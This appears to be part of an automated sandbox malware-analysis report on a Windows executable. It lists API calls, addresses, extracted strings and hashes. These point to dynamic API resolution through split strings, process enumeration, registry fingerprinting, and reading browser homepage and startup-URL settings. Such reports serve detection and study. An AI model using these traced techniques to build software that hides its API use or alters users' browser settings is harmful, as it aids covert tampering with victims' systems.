                                                                                                                                                                                                          • KillTimer.USER32(?,?,?,75A92370,00000000), ref: 004999E1
                                                                                                                                                                                                          • HideCaret.USER32(?), ref: 004999EC
                                                                                                                                                                                                          • UpdateLayeredWindow.USER32(?,?,?,?,00000000,00000000,00000000,01FF0000,00000002), ref: 00499A1C
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00499A2A
                                                                                                                                                                                                          • GetCaretBlinkTime.USER32(00000000,?,75A92370,00000000), ref: 00499A44
                                                                                                                                                                                                          • SetTimer.USER32(?,?,00000000), ref: 00499A51
                                                                                                                                                                                                          • ShowCaret.USER32(?), ref: 00499A5C
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00499A97
                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00499A9E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ObjectSelect$CaretDeleteRect$ClipTimerViewport$BlinkClientCreateHideKillLayeredShowTimeUpdate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 793400785-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
[Control-flow graph, entry block 48ff50-48ffb5; graph not reproduced]
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048FFD7
                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00020019,00000000,?,00000000), ref: 0048FFF7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0049005C
                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000), ref: 0049007F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004900CB
                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MediaSubType,00000000,00000004,00000000,00000004), ref: 004900F5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004901F7
                                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 00490205
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0049023B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Open$CloseEnterInit_thread_footerInitializeLeaveQueryValue
                                                                                                                                                                                                          • String ID: %s\Connection$Key$MediaSubType$PCI$PnpInstanceID$RegC$RegO$System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}$lose
                                                                                                                                                                                                          • API String ID: 1220120693-1602475108
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: GlobalSize$Window_wcsrchr
                                                                                                                                                                                                          • String ID: CollectGarbage();$DirectUI.js$config.xml$directui$ducontrol$duwindow$name$resManager$theme$winManager
                                                                                                                                                                                                          • API String ID: 1149426230-2029015323
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,EFE0703F,00000000,00000000), ref: 0048D407
                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?), ref: 0048D413
                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,?), ref: 0048D425
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0048D44B
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048D46D
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048D825
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0048D837
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseHandle$CreatePointerSizeWrite
                                                                                                                                                                                                          • String ID: %02x$[Profile]$config1$config2$config3$config4$config5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 004A0903
                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 004A0A53
                                                                                                                                                                                                          • 73A0A570.USER32(00000000,00000000,004A0160,00000000,00000000,?,theme,directui), ref: 004A0B0A
                                                                                                                                                                                                          • EnumFontsW.GDI32(00000000), ref: 004A0B11
                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 004A0C02
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                            • Part of subcall function 0046CE40: GetProcAddress.KERNEL32(?,?), ref: 0046CE79
                                                                                                                                                                                                            • Part of subcall function 004CD160: RtlEnterCriticalSection.NTDLL(005980A4), ref: 004CD1DC
                                                                                                                                                                                                            • Part of subcall function 004CD160: RtlLeaveCriticalSection.NTDLL(005980A4), ref: 004CD22A
                                                                                                                                                                                                            • Part of subcall function 004CD160: CoCreateInstance.COMBASE(00000000,00000000,00000017,00564AB0,00000000), ref: 004CD253
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterGlobalLeaveSize$A570AddressCreateEnumFontsInit_thread_footerInitializeInstanceProc_wcsrchr
                                                                                                                                                                                                          • String ID: CollectGarbage();$DirectUI.js$config.xml$directui$resManager$theme$winManager
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,?,00000000,?), ref: 0041B674
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041B6E0
                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000400,00000000,?), ref: 0041B71E
                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 0041B78C
                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0041B796
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000007E8,00000000,00000000), ref: 0041B7AB
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000001), ref: 0041B7B9
                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0041B7C1
                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041B7C8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B7CF
                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 0041B7DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFileSectionWindow$CloseCreateHandleView$EnterErrorForegroundInit_thread_footerInitializeLastLeaveMappingMessageMutexSendShowUnmap
                                                                                                                                                                                                          • String ID: ATL:MemData03EA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetPropW.USER32(?,SYSPLUGIN), ref: 004976A1
                                                                                                                                                                                                          • RemovePropW.USER32(?,SYSPLUGIN), ref: 0049770C
                                                                                                                                                                                                          • GetClassLongW.USER32(?,000000E6), ref: 0049772B
                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000E6,00000000), ref: 00497738
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000237), ref: 004977B0
                                                                                                                                                                                                            • Part of subcall function 004A2A00: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A2A47
                                                                                                                                                                                                            • Part of subcall function 004A2A00: SetWindowPos.USER32(?,00000000,?,?,00000000,?,00000214,75A92370,00000000,00000000), ref: 004A2AB9
                                                                                                                                                                                                            • Part of subcall function 004992F0: IsWindow.USER32(?), ref: 004992FB
                                                                                                                                                                                                          • 73A0A570.USER32(?), ref: 004977C8
                                                                                                                                                                                                            • Part of subcall function 004996E0: DeleteObject.GDI32(?), ref: 00499736
                                                                                                                                                                                                            • Part of subcall function 004996E0: GetClientRect.USER32(?,?), ref: 0049974B
                                                                                                                                                                                                            • Part of subcall function 004996E0: SelectObject.GDI32(00000000,00000000), ref: 0049979E
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 004977E6
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,tooltips_class32,00571978,80000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0049780B
                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00497823
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ClassLongObjectProp$A570ClientCreateDeleteHandleInfoModuleParametersRectRemoveSelectSystem
                                                                                                                                                                                                          • String ID: SYSPLUGIN$tooltips_class32
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,75920E50,00000002,004D80FF), ref: 004F319E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 004F31B8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                                                                                          • API String ID: 1646373207-3327535076
                                                                                                                                                                                                          • Opcode ID: 8bc75b4a7cfa62d7bfb5fa97cd9b3d04a01ea3466b8b4b09afe4742b6252688f
                                                                                                                                                                                                          • Instruction ID: d0f0a0077bccb34425ef9b4ac95bebf668861f8af76a6435c59df848463201ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bc75b4a7cfa62d7bfb5fa97cd9b3d04a01ea3466b8b4b09afe4742b6252688f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA415B35300305ABEF104F68AC487BBBB68EF56316F1440BBED05D7352EA768A0A8354
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00000000,007F9738), ref: 0046DCE4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046DD1B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046DD40
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046DD5E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                          • String ID: Valu$VerQ$dll$foSi$ion.$uery$vers
                                                                                                                                                                                                          • API String ID: 2238633743-3386711270
                                                                                                                                                                                                          • Opcode ID: 4979028e2a5a69b3c06800cdf58786957db35159d2fd76c2291e31f453e3b0ee
                                                                                                                                                                                                          • Instruction ID: 74823da3dc24b8292d3ced95fd42fbba1b00a736b9c2f89e65147783e8b47aa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4979028e2a5a69b3c06800cdf58786957db35159d2fd76c2291e31f453e3b0ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E3129B1D0064AEBDB00CF99D9447DEFBF8FF58304F10821AE428A7650EB74A654CB95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00483970: GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                            • Part of subcall function 00483970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,EFE0703F), ref: 00404337
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00404357
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 00404361
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,THUIDBEGKGSADW,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040437E
                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 004043A3
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A7B
                                                                                                                                                                                                          • SetTimer.USER32(?,00002F59,00001770,00000000), ref: 00404467
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,00000000,EFE0703F,?,?), ref: 004046D6
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A,?,?,?), ref: 00404776
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00404782
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F,?), ref: 0040538D
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A), ref: 00405433
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegCloseKey.ADVAPI32(00000000), ref: 0040543F
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?,home), ref: 0040452F
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 00404536
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle$Create$EventModuleOpenProcess32QueryValueWindow$AddressClassFirstLongNextProcRegisterSnapshotTimerToolhelp32
                                                                                                                                                                                                          • String ID: THUIDBEGKGSADW$home
                                                                                                                                                                                                          • API String ID: 3099295237-1807252216
                                                                                                                                                                                                          • Opcode ID: 5d34372b7bd3ee3651931b0817b8e93c7a9ae7619bbc4397521099f72e0b056b
                                                                                                                                                                                                          • Instruction ID: de3f61e570d049e69affd51998ca8969852e6dcd6c4531ab67e07bd7b4b86903
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d34372b7bd3ee3651931b0817b8e93c7a9ae7619bbc4397521099f72e0b056b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1D5B0A102089BEB14EFA4CC49B9EBF75FF81308F104269E505BB2D1DBB95A84CB55
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0046F2A1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                          • String ID: ({Y$dtrR
                                                                                                                                                                                                          • API String ID: 2882836952-3251534292
                                                                                                                                                                                                          • Opcode ID: b9d3db8f0998f64f23b0f49ef3fb0bbfc950efb19b83652c75b400f21217ff7c
                                                                                                                                                                                                          • Instruction ID: 2c0bf983d58812fb3ef5785e21656bdbf6918a1aa19d560037ee40d037b65249
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d3db8f0998f64f23b0f49ef3fb0bbfc950efb19b83652c75b400f21217ff7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F810275100605DFCB20CF24E884A66B7B2FF69314B20417BD89587751EB38EC8ADF96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437F24
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437F7E
                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,InstallDate,00000000,?,?,00000100,?,00000000), ref: 00437F99
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437FCB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$EnterInit_thread_footerInitializeLeaveQueryValue
                                                                                                                                                                                                          • String ID: InstallDate$Key$RegC$RegO$SOFTWARE\Microsoft\Windows NT\CurrentVersion$lose
                                                                                                                                                                                                          • API String ID: 1722220145-3360175959
                                                                                                                                                                                                          • Opcode ID: eeb8f4af582e9e18a070b9b1cf8443e48bd264543de679c0b597f88aede0d498
                                                                                                                                                                                                          • Instruction ID: f51dd1c5e7569d7ee64366b7a600911872349635878d4a96c5e6906628fae09d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb8f4af582e9e18a070b9b1cf8443e48bd264543de679c0b597f88aede0d498
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49413EB1A002099FDB10DFA9D981AEFBBF8FF48300F10556EE545F3241DB74AA448BA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F,?), ref: 0040538D
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A), ref: 00405433
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040543F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405607
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F), ref: 00405AB4
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00740053,00000000,00000001,?,00000104), ref: 00405B35
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00405B41
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue$AddressProc
                                                                                                                                                                                                          • String ID: home$page
                                                                                                                                                                                                          • API String ID: 3111369219-3140408881
                                                                                                                                                                                                          • Opcode ID: 7b79eba9263786893866ec1fa9af5feaea01591360d849ea7da4990455b0358d
                                                                                                                                                                                                          • Instruction ID: 38e7d1d0abe333740f891d0304dc5927cb132ff78b16d22ca422c218e70641b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b79eba9263786893866ec1fa9af5feaea01591360d849ea7da4990455b0358d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F627DB0901618DBEB24DF54CD48BDEBBB5FF44308F1042ADD509A7291DBB96A88CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405D0F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405D8C
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?,?,?,?,?,?,?), ref: 00405D9B
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ces$ion$sess$star$tup_$urls
                                                                                                                                                                                                          • API String ID: 2857489092-3847234075
